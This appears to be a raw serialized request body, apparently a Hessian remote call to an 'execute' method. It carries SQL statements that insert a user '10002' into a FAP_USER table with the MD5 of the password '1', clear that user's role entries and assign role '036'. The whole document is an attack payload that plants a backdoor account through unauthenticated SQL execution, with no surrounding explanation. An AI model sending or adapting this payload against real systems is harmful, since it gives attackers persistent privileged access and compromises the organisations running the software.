"c\x00\x01m\x00\x07executeVt\x00\x7FSystem.Collections.Generic.List`1[[System.String, mscorlib,"
" Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]l\x00\x00\x00\x04S\x01\x1B"
"insert into FAP_USER (YEAR, OG_CODE, USER_CODE, USER_NAME, TEL, USER_PASSWORD,QUOTA_USER_ID, E"
"NABLED, USER_TYPE, IS_LOGIN, IS_CARD, CARD_ID, ADMIN_USER, REMARK,HEAD_PORT_INDEX)  values (20"
"16,'0000100012','10002','xn2','','c4ca4238a0b923820dcc509a6f75849b','',1,0,1,0,'','10002','',0"
")S\x00^delete fap_user_role_set  where year = 2016 and og_code = '0000100012' and user_code = "
"'10002'S\x00Zdelete fap_user_role  where year = 2016 and og_code = '0000100012' and user_code "
"= '10002'S\x00ginsert into fap_user_role (year, og_code, user_code, role_code) values(2016,'00"
"00100012','10002','036')zz"
